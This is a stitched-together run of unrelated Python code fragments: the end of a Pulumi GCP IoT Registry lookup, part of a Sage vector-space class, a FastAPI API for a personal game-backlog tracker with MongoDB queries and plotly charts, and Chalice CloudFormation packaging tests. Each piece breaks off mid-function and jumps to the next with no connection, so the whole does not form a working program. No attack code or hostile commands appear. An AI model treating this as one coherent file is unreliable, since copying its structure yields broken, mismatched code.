__props__ = _RegistryState.__new__(_RegistryState)
__props__.__dict__["credentials"] = credentials
__props__.__dict__["event_notification_configs"] = event_notification_configs
__props__.__dict__["http_config"] = http_config
__props__.__dict__["log_level"] = log_level
__props__.__dict__["mqtt_config"] = mqtt_config
__props__.__dict__["name"] = name
__props__.__dict__["project"] = project
__props__.__dict__["region"] = region
__props__.__dict__["state_notification_config"] = state_notification_config
return Registry(resource_name, opts=opts, __props__=__props__)
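# Minimal usage sketch (the resource name and id below are illustrative):
#
#     existing = Registry.get(
#         'imported-registry',
#         id='my-project/us-central1/my-registry')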
Generic tests, including saving and loading submodules and elements::
sage: TestSuite(W).run()
sage: K.<x> = FractionField(PolynomialRing(QQ,'x'))
sage: M = K^3; W = M.span_of_basis([[1,1,x]])
sage: TestSuite(W).run()
"""
def __init__(self, ambient, basis, check=True,
echelonize=False, echelonized_basis=None, already_echelonized=False):
"""
Create a vector space with given basis.
EXAMPLES::
sage: V = QQ^3
sage: W = V.span_of_basis([[1,2,3],[4,5,6]])
sage: W
Vector space of degree 3 and dimension 2 over Rational Field
User basis matrix:
[1 2 3]
[4 5 6]
"""
FreeModule_submodule_with_basis_pid.__init__(
self, ambient, basis=basis, check=check, echelonize=echelonize,
echelonized_basis=echelonized_basis, already_echelonized=already_echelonized)
def _repr_(self):
"""
The printing representation of self.
EXAMPLES::
sage: V = VectorSpace(QQ,5)
sage: U = V.submodule([ V.gen(i) - V.gen(0) for i in range(1,5) ])
sage: print U # indirect doctest
Vector space of degree 5 and dimension 4 over Rational Field
Basis matrix:
[ 1 0 0 0 -1]
[ 0 1 0 0 -1]
[ 0 0 1 0 -1]
[ 0 0 0 1 -1]
sage: print U._repr_()
Vector space of degree 5 and dimension 4 over Rational Field
Basis matrix:
[ 1 0 0 0 -1]
[ 0 1 0 0 -1]
[ 0 0 1 0 -1]
[ 0 0 0 1 -1]
The system representation can be overwritten, but leaves _repr_
unmodified.
::
sage: U.rename('U')
sage: print U
U
sage: print U._repr_()
Vector space of degree 5 and dimension 4 over Rational Field
Basis matrix:
[ 1 0 0 0 -1]
[ 0 1 0 0 -1]
[ 0 0 1 0 -1]
[ 0 0 0 1 -1]
Sparse vector spaces print this fact.
::
sage: VV = VectorSpace(QQ,5,sparse=True)
sage: UU = VV.submodule([ VV.gen(i) - VV.gen(0) for i in range(1,5) ])
sage: print UU # indirect doctest
Sparse vector space of degree 5 and dimension 4 over Rational Field
Basis matrix:
[ 1 0 0 0 -1]
[ 0 1 0 0 -1]
[ 0 0 1 0 -1]
[ 0 0 0 1 -1]
(Now clean up again.)
::
sage: U.reset_name()
sage: print U
Vector space of degree 5 and dimension 4 over Rational Field
Basis matrix:
[ 1 0 0 0 -1]
[ 0 1 0 0 -1]
[ 0 0 1 0 -1]
[ 0 0 0 1 -1]
"""
if self.is_sparse():
return "Sparse vector space of degree %s and dimension %s over %s\n"%(
self.degree(), self.dimension(), self.base_field()) + \
"User basis matrix:\n%s"%self.basis_matrix()
else:
return "Vector space of degree %s and dimension %s over %s\n"%(
self.degree(), self.dimension(), self.base_field()) + \
"User basis matrix:\n%s"%self.basis_matrix()
def _denominator(self, B):
"""
Given a list (of field elements) returns 1 as the common
denominator.
N.B.: This function is for internal use only!
EXAMPLES::
sage: U = QQ^3
sage: U
Vector space of dimension 3 over Rational Field
sage: U.denominator()
1
sage: V = U.span([[1,1/2,1/3], [-1/5,2/3,3]])
sage: V
Vector space of degree 3 and dimension 2 over Rational Field
Basis matrix:
[ 1 0 -5/3]
[ 0 1 4]
sage: W = U.submodule_with_basis([[1,1/2,1/3], [-1/5,2/3,3]])
sage: W
Vector space of degree 3 and dimension 2 over Rational Field
User basis matrix:
[ 1 1/2 1/3]
[-1/5 2/3 3]
sage: W._denominator(W.echelonized_basis_matrix().list())
1
"""
return 1
def _echelonized_basis(self, ambient, basis):
"""
Given the ambient space and a basis, constructs and caches the
__echelonized_basis_matrix and returns its rows.
N.B. This function is for internal use only!
EXAMPLES::
sage: M = ZZ^3
sage: N = M.submodule_with_basis([[1,1,0],[0,2,1]])
sage: N._echelonized_basis(M,N.basis())
[(1, 1, 0), (0, 2, 1)]
sage: V = QQ^3
sage: W = V.submodule_with_basis([[1,1,0],[0,2,1]])
sage: W._echelonized_basis(V,W.basis())
[(1, 0, -1/2), (0, 1, 1/2)]
"""
MAT = sage.matrix.matrix_space.MatrixSpace(
base_ring=ambient.base_ring(),
nrows=len(basis), ncols=ambient.degree(),
sparse=ambient.is_sparse())
A = MAT(basis)
E = A.echelon_form()
# Return the first rank rows (i.e., the nonzero rows).
return E.rows()[:E.rank()]
def is_ambient(self):
"""
Return False since this is not an ambient module.
EXAMPLES::
sage: V = QQ^3
sage: V.is_ambient()
True
sage: W = V.span_of_basis([[1,2,3],[4,5,6]])
sage: W.is_ambient()
False
"""
return False
class FreeModule_submodule_field(FreeModule_submodule_with_basis_field):
"""
An embedded vector subspace with echelonized basis.
EXAMPLES:
Since this is an embedded vector subspace with echelonized basis,
the echelon_coordinates() and user coordinates() agree::
sage: V = QQ^3
sage: W = V.span([[1,2,3],[4,5,6]])
sage: W
Vector space of degree 3 and dimension 2 over Rational Field
Basis matrix:
[ 1 0 -1]
[ 0 1 2]
::
sage: v = V([1,5,9])
sage: W.echelon_coordinates(v)
[1, 5]
sage: vector(QQ, W.echelon_coordinates(v)) * W.basis_matrix()
(1, 5, 9)
sage: v = V([1,5,9])
sage: W.coordinates(v)
[1, 5]
sage: vector(QQ, W.coordinates(v)) * W.basis_matrix()
(1, 5, 9)
"""
def __init__(self, ambient, gens, check=True, already_echelonized=False):
"""
Create an embedded vector subspace with echelonized basis.
EXAMPLES::
sage: V = QQ^3
sage: W = V.span([[1,2,3],[4,5,6]])
sage: W
Vector space of degree 3 and dimension 2 over Rational Field
Basis matrix:
[ 1 0 -1]
[ 0 1 2]
"""
if is_FreeModule(gens):
gens = gens.gens()
FreeModule_submodule_with_basis_field.__init__(self, ambient, basis=gens, check=check,
echelonize=not already_echelonized, already_echelonized=already_echelonized)
def _repr_(self):
"""
The default printing representation of self.
EXAMPLES::
sage: V = VectorSpace(QQ,5)
sage: U = V.submodule([ V.gen(i) - V.gen(0) for i in range(1,5) ])
sage: print U # indirect doctest
Vector space of degree 5 and dimension 4 over Rational Field
Basis matrix:
[ 1 0 0 0 -1]
[ 0 1 0 0 -1]
[ 0 0 1 0 -1]
[ 0 0 0 1 -1]
sage: print U._repr_()
Vector space of degree 5 and dimension 4 over Rational Field
Basis matrix:
[ 1 0 0 0 -1]
[ 0 1 0 0 -1]
[ 0 0 1 0 -1]
[ 0 0 0 1 -1]
The system representation can be overwritten, but leaves _repr_
unmodified.
::
sage: U.rename('U')
sage: print U
U
sage: print U._repr_()
Vector space of degree 5 and dimension 4 over Rational Field
Basis matrix:
[ 1 0 0 0 -1]
[ 0 1 0 0 -1]
[ 0 0 1 0 -1]
[ 0 0 0 1 -1]
Sparse vector spaces print this fact.
::
sage: VV = VectorSpace(QQ,5,sparse=True)
sage: UU = VV.submodule([ VV.gen(i) - VV.gen(0) for i in range(1,5) ])
sage: print UU # indirect doctest
Sparse vector space of degree 5 and dimension 4 over Rational Field
Basis matrix:
[ 1 0 0 0 -1]
[ 0 1 0 0 -1]
[ 0 0 1 0 -1]
[ 0 0 0 1 -1]
(Now clean up again.)
::
sage: U.reset_name()
sage: print U
Vector space of degree 5 and dimension 4 over Rational Field
Basis matrix:
[ 1 0 0 0 -1]
[ 0 1 0 0 -1]
[ 0 0 1 0 -1]
[ 0 0 0 1 -1]
"""
if self.is_sparse():
return "Sparse vector space of degree %s and dimension %s over %s\n"%(
self.degree(), self.dimension(), self.base_field()) + \
"Basis matrix:\n%s"%self.basis_matrix()
else:
return "Vector space of degree %s and dimension %s over %s\n"%(
self.degree(), self.dimension(), self.base_field()) + \
"Basis matrix:\n%s"%self.basis_matrix()
def echelon_coordinates(self, v, check=True):
"""
Write `v` in terms of the echelonized basis of self.
INPUT:
- ``v`` - vector
- ``check`` - bool (default: True); if True, also
verify that v is really in self.
OUTPUT: list
Returns a list `c` such that if `B` is the basis for self, then
.. math::
\sum c_i B_i = v.
If `v` is not in self, raises an ``ArithmeticError`` exception.
EXAMPLES::
sage: V = QQ^3
sage: W = V.span([[1,2,3],[4,5,6]])
sage: W
Vector space of degree 3 and dimension 2 over Rational Field
Basis matrix:
[ 1 0 -1]
[ 0 1 2]
::
sage: v = V([1,5,9])
sage: W.echelon_coordinates(v)
[1, 5]
sage: vector(QQ, W.echelon_coordinates(v)) * W.basis_matrix()
(1, 5, 9)
"""
if not isinstance(v, free_module_element.FreeModuleElement):
v = self.ambient_vector_space()(v)
if v.degree() != self.degree():
raise ArithmeticError, "v (=%s) is not in self"%v
E = self.echelonized_basis_matrix()
P = E.pivots()
if len(P) == 0:
if check and v != 0:
raise ArithmeticError, "vector is not in free module"
return []
w = v.list_from_positions(P)
if not check:
# It's really really easy.
return w
if v.parent() is self: # obvious case: v already lives in self
return w
<reponame>AnnuityDew/tarpey-dev
# import Python packages
from datetime import datetime
from enum import Enum
import json
from typing import List, Optional
# import third party packages
from fastapi import APIRouter, Depends, HTTPException
from motor.motor_asyncio import AsyncIOMotorClient
import numpy
import pandas
import plotly
import plotly.express as px
from odmantic import AIOEngine, Field, Model, ObjectId, query
# import custom local stuff
from src.db.atlas import get_odm
from src.api.users import UserOut, oauth2_scheme
hysx_api = APIRouter(
prefix="/haveyouseenx",
tags=["haveyouseenx"],
)
class YesNo(str, Enum):
YES = "Y"
NO = "N"
class GameStatus(str, Enum):
NOT_STARTED = "Not Started"
STARTED = "Started"
BEATEN = "Beaten"
COMPLETED = "Completed"
MASTERED = "Mastered"
INFINITE = "Infinite"
WISH_LIST = "Wish List"
class PlaytimeCalc(str, Enum):
ACTUAL = "Actual"
ESTIMATE = "Estimate"
class BacklogGame(Model):
game_title: str
sub_title: Optional[str]
game_system: str
genre: str
dlc: YesNo
now_playing: YesNo
game_status: GameStatus
game_hours: Optional[int]
game_minutes: Optional[int]
playtime_calc: Optional[PlaytimeCalc]
add_date: Optional[datetime]
start_date: Optional[datetime]
beat_date: Optional[datetime]
complete_date: Optional[datetime]
game_notes: Optional[str]
class BacklogGamePatch(Model):
game_title: Optional[str]
sub_title: Optional[str]
game_system: Optional[str]
genre: Optional[str]
dlc: Optional[YesNo]
now_playing: Optional[YesNo]
game_status: Optional[GameStatus]
game_hours: Optional[int]
game_minutes: Optional[int]
playtime_calc: Optional[PlaytimeCalc]
add_date: Optional[datetime]
start_date: Optional[datetime]
beat_date: Optional[datetime]
complete_date: Optional[datetime]
game_notes: Optional[str]
@hysx_api.get('/annuitydew/game/all')
async def get_all_games(client: AsyncIOMotorClient = Depends(get_odm)):
engine = AIOEngine(motor_client=client, database="backlogs")
data = [game async for game in engine.find(BacklogGame, sort=BacklogGame.id)]
if data:
return data
else:
raise HTTPException(status_code=404, detail="No data found!")
@hysx_api.post('/annuitydew/game')
async def add_games(
doc_list: List[BacklogGame],
client: AsyncIOMotorClient = Depends(get_odm),
user: UserOut = Depends(oauth2_scheme),
):
engine = AIOEngine(motor_client=client, database="backlogs")
result = await engine.save_all(doc_list)
return {
"result": result,
}
@hysx_api.get('/annuitydew/game/{oid}', response_model=BacklogGame)
async def get_game(
oid: ObjectId,
client: AsyncIOMotorClient = Depends(get_odm),
user: UserOut = Depends(oauth2_scheme),
):
engine = AIOEngine(motor_client=client, database="backlogs")
game = await engine.find_one(BacklogGame, BacklogGame.id == oid)
if game:
return game
else:
raise HTTPException(status_code=404, detail="No data found!")
@hysx_api.patch('/annuitydew/game/{oid}')
async def edit_game(
oid: ObjectId,
patch: BacklogGamePatch,
client: AsyncIOMotorClient = Depends(get_odm),
user: UserOut = Depends(oauth2_scheme),
):
engine = AIOEngine(motor_client=client, database="backlogs")
game = await engine.find_one(BacklogGamePatch, BacklogGamePatch.id == oid)
if game is None:
raise HTTPException(status_code=404, detail="No data found!")
patch_dict = patch.dict(exclude_unset=True)
for attr, value in patch_dict.items():
setattr(game, attr, value)
result = await engine.save(game)
return {
"result": result,
}
@hysx_api.delete('/annuitydew/game/{oid}')
async def delete_game(
oid: ObjectId,
client: AsyncIOMotorClient = Depends(get_odm),
user: UserOut = Depends(oauth2_scheme),
):
engine = AIOEngine(motor_client=client, database="backlogs")
game = await engine.find_one(BacklogGame, BacklogGame.id == oid)
if game is None:
raise HTTPException(status_code=404, detail="No data found!")
await engine.delete(game)
return {
"game": game,
}
@hysx_api.get('/annuitydew/stats/counts')
async def count_by_status(client: AsyncIOMotorClient = Depends(get_odm)):
engine = AIOEngine(motor_client=client, database="backlogs")
collection = engine.get_collection(BacklogGame)
results = await collection.aggregate([{
'$group': {
'_id': '$game_status',
'count': {
'$sum': 1
}
}
}]).to_list(length=None)
stats = {result.get('_id'): result.get('count') for result in results}
sorted_stats = dict(sorted(stats.items(), key=lambda item: item[1], reverse=True))
return sorted_stats
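# Illustrative result shape (counts are made up): the $group stage yields
# documents like {'_id': 'Beaten', 'count': 42}, which the comprehension
# above flattens into {'Beaten': 42, ...} sorted by count, descending.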
@hysx_api.get('/annuitydew/stats/playtime')
async def playtime(client: AsyncIOMotorClient = Depends(get_odm)):
engine = AIOEngine(motor_client=client, database="backlogs")
collection = engine.get_collection(BacklogGame)
results = await collection.aggregate([{
'$group': {
'_id': None,
'total_hours': {
'$sum': '$game_hours'
},
'total_minutes': {
'$sum': '$game_minutes'
}
}
}]).to_list(length=None)
# move chunks of 60 minutes into the hours count
leftover_minutes = results[0].get('total_minutes') % 60
hours_to_move = (results[0].get('total_minutes') - leftover_minutes) / 60
results[0]['total_hours'] = int(results[0]['total_hours'] + hours_to_move)
results[0]['total_minutes'] = int(leftover_minutes)
return results[0]
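# A hypothetical helper (not used by the endpoint) illustrating the carry
# above: chunks of 60 minutes move into the hours count, e.g. 500 minutes
# becomes 8 extra hours plus 20 leftover minutes.
def _demo_minute_carry(total_minutes: int = 500):
    leftover_minutes = total_minutes % 60
    hours_to_move = (total_minutes - leftover_minutes) // 60
    return hours_to_move, leftover_minutes  # (8, 20)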
@hysx_api.get('/annuitydew/search', response_model=List[BacklogGame])
async def search(
client: AsyncIOMotorClient = Depends(get_odm),
dlc: YesNo = None,
now_playing: YesNo = None,
game_status: GameStatus = None,
q: str = None,
):
engine = AIOEngine(motor_client=client, database="backlogs")
initial_args = {
'dlc': dlc,
'now_playing': now_playing,
'game_status': game_status,
}
final_args = { k:v for k, v in initial_args.items() if v is not None }
if final_args:
query_expression_list = [
(getattr(BacklogGame, key)) == value for key, value in final_args.items()
]
combined_query_expression = query.and_(*query_expression_list)
else:
combined_query_expression = False
# Quoting the term (f"\"{q}\"") makes Mongo's $text run a strict phrase search; passing plain q would OR the individual words instead.
if combined_query_expression:
results = await engine.find(
BacklogGame,
combined_query_expression,
sort=(BacklogGame.dlc, BacklogGame.id),
)
elif q == '' or q is None:
results = await engine.find(
BacklogGame,
sort=(BacklogGame.dlc, BacklogGame.id),
)
else:
results = await engine.find(
BacklogGame,
{ '$text': { '$search': f"\"{q}\"" }},
sort=(BacklogGame.dlc, BacklogGame.id),
)
return results
@hysx_api.get('/annuitydew/treemap')
async def system_treemap(backlog: List[BacklogGame] = Depends(get_all_games)):
# convert to pandas dataframe
backlog = pandas.DataFrame([game.doc() for game in backlog])
# read backlog and create a count column
backlog['count'] = 1
# column to serve as the root of the backlog
backlog['backlog'] = 'Backlog'
# complete gametime calc
backlog['game_hours'] = (
backlog['game_hours'] + (backlog['game_minutes'] / 60)
)
# group by game_system and game_status,
# aggregating game counts and hours
system_status_df = backlog.groupby(
by=[
'backlog',
'game_system',
'game_status',
]
).agg(
{
'count': sum,
'game_hours': sum,
}
).reset_index()
figure = px.treemap(
system_status_df,
path=['backlog', 'game_status', 'game_system'],
values='count',
color=numpy.log10(system_status_df['game_hours']),
color_continuous_scale=px.colors.diverging.Spectral_r,
hover_data=['game_hours'],
)
# update margins and colors
figure.update_layout(
margin=dict(l=10, r=0, t=10, b=10),
)
figure.layout.coloraxis.colorbar = dict(
title='Hours',
tickvals=[1.0, 2.0, 3.0],
ticktext=[10, 100, 1000],
)
# convert to JSON for the web
return json.loads(plotly.io.to_json(figure))
@hysx_api.get('/annuitydew/bubbles')
async def system_bubbles(backlog: List[BacklogGame] = Depends(get_all_games)):
# convert to pandas dataframe
backlog = pandas.DataFrame([game.doc() for game in backlog])
# read backlog and create a count column
backlog['count_dist'] = 1
# complete gametime calc
backlog['game_hours'] = (
backlog['game_hours'] + (backlog['game_minutes'] / 60)
)
# group by game_system and game_status,
# aggregating game counts and hours
system_status_df = backlog.groupby(
by=[
'game_system',
'game_status',
]
).agg(
{
'count_dist': sum,
'game_hours': sum,
}
)
# we also want the % in each category for each system
# this code takes care of that
system_totals = system_status_df.groupby(['game_system']).agg({'count_dist': sum})
normalized_df = system_status_df.div(system_totals, level='game_system')
normalized_df['game_hours'] = system_status_df['game_hours']
normalized_df['total_count'] = system_status_df['count_dist']
# now reset index and prep the data for JS
normalized_df.reset_index(inplace=True)
# x data for each status
x_data_counts = [
normalized_df.loc[
normalized_df.game_status == status
].total_count.tolist() for status in normalized_df.game_status.unique().tolist()
]
# y data for each status
y_data_dist = [
normalized_df.loc[
normalized_df.game_status == status
].count_dist.tolist() for status in normalized_df.game_status.unique().tolist()
]
# z data for each status
z_data_hours = [
normalized_df.loc[
normalized_df.game_status == status
].game_hours.tolist() for status in normalized_df.game_status.unique().tolist()
]
# systems for each status
label_data = [
normalized_df.loc[
normalized_df.game_status == status
].game_system.tolist() for status in normalized_df.game_status.unique().tolist()
]
# categories
bubble_names = normalized_df.game_status.unique().tolist()
# list of hex color codes
color_data = px.colors.qualitative.Bold
return {
'x_data_counts': x_data_counts,
'y_data_dist': y_data_dist,
'z_data_hours': z_data_hours,
'bubble_names': bubble_names,
'label_data': label_data,
'color_data': color_data,
}
@hysx_api.get('/annuitydew/timeline')
async def timeline(
backlog: List[BacklogGame] = Depends(get_all_games),
stats=Depends(count_by_status)
):
# convert to pandas dataframe
backlog = pandas.DataFrame([game.doc() for game in backlog])
# drop unused columns, move dates to x axis to create timeline
# sort for most recent event at the top
backlog = backlog[[
'_id',
'game_title',
'sub_title',
'add_date',
'start_date',
'beat_date',
'complete_date',
]].melt(
id_vars=['_id', 'game_title', 'sub_title'],
var_name='event_name',
value_name='event_date',
)
# fill empty cells with the backlog's birth date
backlog['event_date'] = (
backlog['event_date'].fillna(numpy.datetime64('2011-10-08T16:00:00'))
)
# event date to datetime
backlog.event_date = pandas.to_datetime(backlog.event_date, utc=True)
# sort by date descending
backlog.sort_values(['event_date', '_id', 'event_name'], ascending=False, inplace=True)
# reset index
backlog.reset_index(inplace=True)
# next, attach the current status counts to every row.
# subtracting the accumulated modifiers from them lets us
# reconstruct the backlog at older points in time using the timeline
backlog['not_started'] = stats.get('Not Started')
backlog['started'] = stats.get('Started')
backlog['beaten'] = stats.get('Beaten')
backlog['completed'] = stats.get('Completed')
backlog = backlog.assign(ns=0, s=0, b=0, c=0)
# initialize modifiers
mod_ns, mod_s, mod_b, mod_c = 0, 0, 0, 0
for row in backlog.itertuples():
backlog.at[row.Index, 'ns'] += mod_ns
backlog.at[row.Index, 's'] += mod_s
backlog.at[row.Index, 'b'] += mod_b
backlog.at[row.Index, 'c'] += mod_c
if row.event_name == 'add_date':
mod_ns += 1
elif row.event_name == 'start_date':
mod_ns -= 1
mod_s += 1
elif row.event_name == 'beat_date':
mod_s -= 1
mod_b += 1
elif row.event_name == 'complete_date':
mod_b -= 1
mod_c += 1
# now recalculate the timeline values. this is our final data
backlog['ns'] = backlog['not_started'] - backlog['ns']
backlog['s'] = backlog['started'] - backlog['s']
backlog['b'] = backlog['beaten'] - backlog['b']
backlog['c'] = backlog['completed'] - backlog['c']
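# Worked example (numbers are illustrative): with current counts ns=10, s=3,
# a row just older than a single start_date event has accumulated mod_ns=-1
# and mod_s=+1, so it reconstructs to ns = 10 - (-1) = 11 and s = 3 - 1 = 2.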
# change sort to ascending and drop unnecessary columns
# set index to event date
backlog = backlog.sort_values(
['event_date', '_id', 'event_name'], ascending=True
)[['event_date', 'ns', 's', 'b', 'c']]
# drop duplicate dates (keep last, that will be most recent)
backlog.drop_duplicates(subset=['event_date'], keep='last', inplace=True)
# set event date as datetime index and resample to daily
# also drop the date column (it's the index now)
# and convert back to integers (resample changes dtype)
time_idx = pandas.DatetimeIndex(backlog.event_date)
backlog.set_index(time_idx, inplace=True)
backlog = backlog.resample('D').pad().drop(
columns='event_date'
).convert_dtypes()
# limit our chart to dates after the birth of the backlog
backlog = backlog[
pandas.Timestamp(
'2015-01-01 00:00:00+0000', tz='UTC', freq='D'
):
]
# x data is time, y_data is our timeline values
y_data_c = [int(data_point) for data_point in backlog.c.tolist()]
'Type': 'AWS::ApiGatewayV2::Integration',
'Properties': {
'ApiId': {
'Ref': 'WebsocketAPI'
},
'ConnectionType': 'INTERNET',
'ContentHandlingStrategy': 'CONVERT_TO_TEXT',
'IntegrationType': 'AWS_PROXY',
'IntegrationUri': {
'Fn::Sub': [
(
'arn:${AWS::Partition}:apigateway'
':${AWS::Region}:lambda:path'
'/2015-03-31/functions/arn:${AWS::Partition}'
':lambda:${AWS::Region}:${AWS::AccountId}'
':function:${WebsocketHandler}/invocations'
),
{'WebsocketHandler': {'Ref': handler}}
],
}
}
}
# Route for the handler.
assert resources['%sRoute' % handler] == {
'Type': 'AWS::ApiGatewayV2::Route',
'Properties': {
'ApiId': {
'Ref': 'WebsocketAPI'
},
'RouteKey': route,
'Target': {
'Fn::Join': [
'/',
[
'integrations',
{'Ref': '%sAPIIntegration' % handler},
]
]
}
}
}
# Ensure the deployment is created. It must explicitly depend on
# the routes, since a deployment cannot be created for a WebsocketAPI
# that has no routes. CloudFormation has no implicit ordering here, so
# without the DependsOn it could create resources out of order.
depends_on = set(resources['WebsocketAPIDeployment'].pop('DependsOn'))
assert set(['WebsocketConnectRoute',
'WebsocketMessageRoute',
'WebsocketDisconnectRoute']) == depends_on
assert resources['WebsocketAPIDeployment'] == {
'Type': 'AWS::ApiGatewayV2::Deployment',
'Properties': {
'ApiId': {
'Ref': 'WebsocketAPI'
}
}
}
# Ensure the stage is created.
assert resources['WebsocketAPIStage'] == {
'Type': 'AWS::ApiGatewayV2::Stage',
'Properties': {
'ApiId': {
'Ref': 'WebsocketAPI'
},
'DeploymentId': {'Ref': 'WebsocketAPIDeployment'},
'StageName': 'api',
}
}
# Ensure the outputs are created
assert template['Outputs'] == {
'WebsocketConnectHandlerArn': {
'Value': {
'Fn::GetAtt': ['WebsocketConnect', 'Arn']
}
},
'WebsocketConnectHandlerName': {
'Value': {'Ref': 'WebsocketConnect'}},
'WebsocketMessageHandlerArn': {
'Value': {
'Fn::GetAtt': ['WebsocketMessage', 'Arn']
}
},
'WebsocketMessageHandlerName': {
'Value': {'Ref': 'WebsocketMessage'}},
'WebsocketDisconnectHandlerArn': {
'Value': {
'Fn::GetAtt': ['WebsocketDisconnect', 'Arn']
}
},
'WebsocketDisconnectHandlerName': {'Value': {
'Ref': 'WebsocketDisconnect'}},
'WebsocketConnectEndpointURL': {
'Value': {
'Fn::Sub': (
'wss://${WebsocketAPI}.execute-api.'
'${AWS::Region}.${AWS::URLSuffix}/api/'
)
}
},
'WebsocketAPIId': {'Value': {'Ref': 'WebsocketAPI'}}
}
def test_managed_iam_role(self):
role = models.ManagedIAMRole(
resource_name='default_role',
role_name='app-dev',
trust_policy=LAMBDA_TRUST_POLICY,
policy=models.AutoGenIAMPolicy(document={'iam': 'policy'}),
)
template = self.template_gen.generate([role])
resources = template['Resources']
assert len(resources) == 1
cfn_role = resources['DefaultRole']
assert cfn_role['Type'] == 'AWS::IAM::Role'
assert cfn_role['Properties']['Policies'] == [
{'PolicyName': 'DefaultRolePolicy',
'PolicyDocument': {'iam': 'policy'}}
]
# Verify the Lambda service trust policy is attached
assert cfn_role['Properties']['AssumeRolePolicyDocument'] == {
'Statement': [{'Action': 'sts:AssumeRole',
'Effect': 'Allow',
'Principal': {'Service': 'lambda.amazonaws.com'},
'Sid': ''}],
'Version': '2012-10-17'}
# Ensure the RoleName is not in the resource properties
# so we don't require CAPABILITY_NAMED_IAM.
assert 'RoleName' not in cfn_role['Properties']
def test_single_role_generated_for_default_config(self,
sample_app_lambda_only):
# The sample_app has one lambda function.
# We'll add a few more and verify they all share the same role.
@sample_app_lambda_only.lambda_function()
def second(event, context):
pass
@sample_app_lambda_only.lambda_function()
def third(event, context):
pass
config = Config.create(chalice_app=sample_app_lambda_only,
project_dir='.',
autogen_policy=True,
api_gateway_stage='api')
template = self.generate_template(config)
roles = [resource for resource in template['Resources'].values()
if resource['Type'] == 'AWS::IAM::Role']
assert len(roles) == 1
# The lambda functions should all reference this role.
functions = [
resource for resource in template['Resources'].values()
if resource['Type'] == 'AWS::Serverless::Function'
]
role_names = [
function['Properties']['Role'] for function in functions
]
assert role_names == [
{'Fn::GetAtt': ['DefaultRole', 'Arn']},
{'Fn::GetAtt': ['DefaultRole', 'Arn']},
{'Fn::GetAtt': ['DefaultRole', 'Arn']},
]
def test_vpc_config_added_to_function(self, sample_app_lambda_only):
config = Config.create(chalice_app=sample_app_lambda_only,
project_dir='.',
autogen_policy=True,
api_gateway_stage='api',
security_group_ids=['sg1', 'sg2'],
subnet_ids=['sn1', 'sn2'])
template = self.generate_template(config)
resources = template['Resources'].values()
lambda_fns = [resource for resource in resources
if resource['Type'] == 'AWS::Serverless::Function']
assert len(lambda_fns) == 1
vpc_config = lambda_fns[0]['Properties']['VpcConfig']
assert vpc_config['SubnetIds'] == ['sn1', 'sn2']
assert vpc_config['SecurityGroupIds'] == ['sg1', 'sg2']
def test_helpful_error_message_on_s3_event(self, sample_app):
@sample_app.on_s3_event(bucket='foo')
def handler(event):
pass
config = Config.create(chalice_app=sample_app,
project_dir='.',
api_gateway_stage='api')
options = PackageOptions(mock.Mock(spec=TypedAWSClient))
with pytest.raises(NotImplementedError) as excinfo:
self.generate_template(config, 'dev', options)
# Should mention the decorator name.
assert '@app.on_s3_event' in str(excinfo.value)
# Should mention you can use `chalice deploy`.
assert 'chalice deploy' in str(excinfo.value)
def test_can_package_sns_handler(self, sample_app):
@sample_app.on_sns_message(topic='foo')
def handler(event):
pass
config = Config.create(chalice_app=sample_app,
project_dir='.',
api_gateway_stage='api')
template = self.generate_template(config)
sns_handler = template['Resources']['Handler']
assert sns_handler['Properties']['Events'] == {
'HandlerSnsSubscription': {
'Type': 'SNS',
'Properties': {
'Topic': {
'Fn::Sub': (
'arn:${AWS::Partition}:sns:${AWS::Region}'
':${AWS::AccountId}:foo'
)
}
},
}
}
def test_can_package_sns_arn_handler(self, sample_app):
arn = 'arn:aws:sns:space-leo-1:1234567890:foo'
@sample_app.on_sns_message(topic=arn)
def handler(event):
pass
config = Config.create(chalice_app=sample_app,
project_dir='.',
api_gateway_stage='api')
template = self.generate_template(config)
sns_handler = template['Resources']['Handler']
assert sns_handler['Properties']['Events'] == {
'HandlerSnsSubscription': {
'Type': 'SNS',
'Properties': {
'Topic': arn,
}
}
}
def test_can_package_sqs_handler(self, sample_app):
@sample_app.on_sqs_message(queue='foo', batch_size=5)
def handler(event):
pass
config = Config.create(chalice_app=sample_app,
project_dir='.',
api_gateway_stage='api')
template = self.generate_template(config)
sqs_handler = template['Resources']['Handler']
assert sqs_handler['Properties']['Events'] == {
'HandlerSqsEventSource': {
'Type': 'SQS',
'Properties': {
'Queue': {
'Fn::Sub': (
'arn:${AWS::Partition}:sqs:${AWS::Region}'
':${AWS::AccountId}:foo'
)
},
'BatchSize': 5,
},
}
}
def test_can_package_kinesis_handler(self, sample_app):
@sample_app.on_kinesis_record(stream='mystream', batch_size=5)
def handler(event):
pass
config = Config.create(chalice_app=sample_app,
project_dir='.',
api_gateway_stage='api')
template = self.generate_template(config)
kinesis_handler = template['Resources']['Handler']
assert kinesis_handler['Properties']['Events'] == {
'HandlerKinesisEventSource': {
'Type': 'Kinesis',
'Properties': {
'Stream': {
'Fn::Sub': (
'arn:${AWS::Partition}:kinesis:${AWS::Region}'
':${AWS::AccountId}:stream/mystream'
)
},
'BatchSize': 5,
'StartingPosition': 'LATEST',
},
}
}
def test_can_package_dynamodb_handler(self, sample_app):
@sample_app.on_dynamodb_record(stream_arn='arn:aws:...:stream',
batch_size=5)
def handler(event):
pass
config = Config.create(chalice_app=sample_app,
project_dir='.',
api_gateway_stage='api')
template = self.generate_template(config)
ddb_handler = template['Resources']['Handler']
assert ddb_handler['Properties']['Events'] == {
'HandlerDynamodbEventSource': {
'Type': 'DynamoDB',
'Properties': {
'Stream': 'arn:aws:...:stream',
'BatchSize': 5,
'StartingPosition': 'LATEST',
},
}
}
def test_can_generate_custom_domain_name(self, sample_app):
config = Config.create(
chalice_app=sample_app,
project_dir='.',
api_gateway_stage='api',
api_gateway_endpoint_type='EDGE',
api_gateway_custom_domain={
"certificate_arn": "my_cert_arn",
"domain_name": "example.com",
"tls_version": "TLS_1_2",
"tags": {"foo": "bar", "bar": "baz"},
}
)
template = self.generate_template(config)
domain = template['Resources']['ApiGatewayCustomDomain']
mapping = template['Resources']['ApiGatewayCustomDomainMapping']
assert domain == {
'Type': 'AWS::ApiGateway::DomainName',
'Properties': {
'CertificateArn': 'my_cert_arn',
'DomainName': 'example.com',
'SecurityPolicy': 'TLS_1_2',
'EndpointConfiguration': {
'Types': ['EDGE']
},
'Tags': [
{'Key': 'bar',
'Value': 'baz'},
{'Key': 'foo',
'Value': 'bar'}
]
}
}
assert mapping == {
'Type': 'AWS::ApiGateway::BasePathMapping',
'Properties': {
'DomainName': {'Ref': 'ApiGatewayCustomDomain'},
'RestApiId': {'Ref': 'RestAPI'},
